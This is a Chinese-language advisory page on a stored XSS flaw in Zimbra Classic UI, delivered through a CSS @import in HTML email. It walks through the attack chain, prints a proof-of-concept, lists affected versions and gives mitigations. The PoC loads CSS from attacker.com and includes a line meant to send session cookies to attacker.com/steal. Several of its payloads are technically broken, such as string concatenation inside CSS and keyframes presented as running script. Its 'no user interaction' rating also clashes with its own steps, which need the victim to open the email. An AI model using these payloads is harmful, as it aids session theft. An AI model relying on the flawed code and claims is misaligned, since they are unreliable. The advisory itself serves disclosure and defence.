CVE-2025-66376 Zimbra Collaboration Classic UI存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66376

漏洞类型

存储型XSS

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Zimbra Collaboration Suite (ZCS)

漏洞概述

CVE-2025-66376是Zimbra Collaboration Suite (ZCS) 10版本中存在的一个高危存储型跨站脚本(XSS)漏洞。该漏洞允许未经认证的攻击者通过发送包含恶意CSS @import指令的HTML电子邮件来执行任意JavaScript代码。攻击者利用Zimbra Classic UI在渲染邮件内容时对CSS样式的处理缺陷，通过@import规则加载外部恶意CSS文件，并借助CSS expression()或其他CSS hack技术在浏览器中执行JavaScript脚本。由于是存储型XSS，恶意载荷会被永久保存在邮件服务器上，所有查看该邮件的用户都会受到攻击影响。攻击者可利用此漏洞窃取用户会话Cookie、劫持账户、执行钓鱼攻击或进行进一步的内网渗透。CVSS评分7.2，属于高危级别，攻击复杂度低且无需任何认证或用户交互即可实现攻击。

技术细节

该漏洞的技术原理在于Zimbra Classic UI在解析和渲染HTML邮件时，对CSS样式表的处理存在安全缺陷。攻击者构造包含CSS @import指令的HTML邮件，当受害者使用Classic UI打开邮件时，邮件客户端会尝试加载外部CSS资源。攻击者控制的外部CSS文件可以包含CSS expression()、-moz-binding或其他浏览器特定属性来执行JavaScript代码。例如，在IE浏览器中可使用expression(alert('XSS'))，在Firefox中可利用-moz-binding属性结合XBL绑定来执行脚本。Zimbra的邮件内容过滤机制未能有效阻止这种CSS注入方式，因为@import指令本身在style标签内是合法的。攻击者通过这种方式绑过内容安全策略(CSP)，因为外部CSS加载不受CSP的script-src限制。最终当邮件被渲染时，恶意JavaScript代码会在受害者的浏览器上下文中执行，从而实现会话劫持、敏感数据窃取等攻击目标。

攻击链分析

STEP 1

步骤1

攻击者注册或入侵一个外部域名，用于托管恶意CSS文件

STEP 2

步骤2

攻击者构造包含CSS @import指令的恶意HTML邮件内容

STEP 3

步骤3

攻击者将此恶意邮件发送到目标Zimbra服务器上的用户邮箱

STEP 4

步骤4

邮件被Zimbra服务器接收并存储，由于是存储型XSS，载荷永久保存

STEP 5

步骤5

受害者使用Zimbra Classic UI登录邮箱并打开该邮件

STEP 6

步骤6

Classic UI渲染HTML邮件时，浏览器执行@import指令加载外部恶意CSS

STEP 7

步骤7

恶意CSS文件利用expression()、-moz-binding等技术在浏览器中执行JavaScript

STEP 8

步骤8

JavaScript代码窃取用户Cookie、会话令牌等敏感信息并发送到攻击者服务器

STEP 9

步骤9

攻击者利用窃取的会话信息劫持受害者账户或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-66376 PoC: Stored XSS via CSS @import in Zimbra Classic UI -->
<!-- Send this HTML email to target Zimbra server -->

<html>
<head>
<style>
@import url('https://attacker.com/malicious.css');
</style>
</head>
<body>
<h1>Test Email</h1>
<p>This email contains malicious CSS import.</p>
</body>
</html>

<!-- On attacker server (malicious.css) -->
/* malicious.css */
body {
  /* IE/Edge expression() XSS payload */
  width: expression(alert(document.cookie));
  /* Alternative payload using CSS parsing */
  background: url('javascript:alert(document.domain)');
}

/* Firefox XBL binding (older versions) */
body {
  -moz-binding: url('https://attacker.com/xbl.xml#xss');
}

/* Modern browser payload using CSS injection */
div::before {
  content: 'PAYLOAD_PLACEHOLDER';
}

/* Bypass technique using @keyframes */
@keyframes xss {
  from { left: 0; }
  to { left: 100%; }
}

/* Trigger JavaScript execution via CSS animation */
input[type="text"]:focus {
  animation: xss 1s infinite;
}

/* Steal session data */
* {
  background-image: url('https://attacker.com/steal?data=' + document.cookie);
}

影响范围

ZCS 10.0.x < 10.0.18

ZCS 10.1.x < 10.1.13

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 强制用户使用Modern UI替代Classic UI；2) 在邮件网关层面过滤包含@import指令的HTML邮件；3) 配置邮件内容过滤器移除style标签和外部CSS引用；4) 在WAF上部署XSS防护规则，拦截CSS expression()等危险属性；5) 提醒用户不要打开来源不明的HTML邮件。但请注意，这些措施仅为临时缓解，生产环境仍应尽快升级到官方修复版本。